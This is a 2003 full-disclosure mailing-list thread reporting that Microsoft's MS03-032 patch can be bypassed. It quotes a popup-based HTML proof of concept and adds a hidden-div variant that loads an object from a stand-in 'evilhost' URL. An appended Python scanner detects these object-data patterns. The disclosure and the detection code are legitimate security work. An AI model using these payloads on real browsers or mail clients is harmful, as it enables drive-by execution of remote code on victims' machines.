
Re: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032



----- Original Message ----- 
From: "http-equiv@xxxxxxxxxx" <1@xxxxxxxxxxx>
To: <full-disclosure@xxxxxxxxxxxxxxxx>
Sent: Sunday, September 07, 2003 6:17 AM
Subject: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032


> 
> 
> Since the cat somehow got out of the bag, and more importantly, this 
> is so blatantly obvious, herewith is the "Bad News":
> 
> The patch for Drew's object data=funky.hta doesn't work:
> 
> http://www.malware.com/badnews.html
> 
> <script>
>   var oPopup = window.createPopup();
> 
>   function showPopup() {
>     oPopup.document.body.innerHTML = "<object data=ouch.php>";
>     oPopup.show(0,0,1,1,document.body);
>   }
>   
>   showPopup()
> </script>

this works too...

<div style="display.none"><object data="http://evilhost/realbad.asp">
</object>oh</div>

beware the mail... 
                            and the rewtXSS skillz


Donnie Werner
morning_wood@xxxxxxxxxxxxxxx
http://exploitlabs.com 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
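A defensive check for the pattern in this thread, as an added example that is not part of the original posts: it flags `<object data=...>` both in static markup and inside script text (the innerHTML route quoted above), which is where a mail or proxy filter would need to look. The function and variable names are hypothetical, and the sample input is constructed from the two snippets in the thread.

```python
import re
from html.parser import HTMLParser

# <object ... data=VALUE> written inside script text (e.g. assigned to innerHTML).
OBJECT_IN_SCRIPT = re.compile(
    r"<object\b[^>]*?\bdata\s*=\s*\\?[\"']?([^\s\"'\\>]+)", re.IGNORECASE)

class ObjectDataScanner(HTMLParser):
    """Collects every <object data=...> reference, static or script-built."""
    def __init__(self):
        super().__init__()
        self.findings = []      # (where, data value) tuples
        self._script = None     # buffer for the current <script> body

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._script = []
        elif tag == "object":
            data = dict(attrs).get("data")
            if data:
                self.findings.append(("markup", data))

    def handle_data(self, text):
        if self._script is not None:
            self._script.append(text)   # script text may arrive in chunks

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body = "".join(self._script)
            self._script = None
            for m in OBJECT_IN_SCRIPT.finditer(body):
                self.findings.append(("script", m.group(1)))

def scan(html):
    scanner = ObjectDataScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample: the two snippets quoted in the thread, plus a benign control.
SAMPLE_PAGE = """<script>
  var oPopup = window.createPopup();
  oPopup.document.body.innerHTML = "<object data=ouch.php>";
</script>
<div style="display.none"><object data="http://evilhost/realbad.asp"></object>oh</div>"""
BENIGN_PAGE = '<p>The object data attribute is discussed here.</p><img src="x.png">'

if __name__ == "__main__":
    for where, value in scan(SAMPLE_PAGE):
        print(where, value)
```

A scanner that only walks the parsed tag tree would miss the first case, since the object element exists only as a string until the script runs.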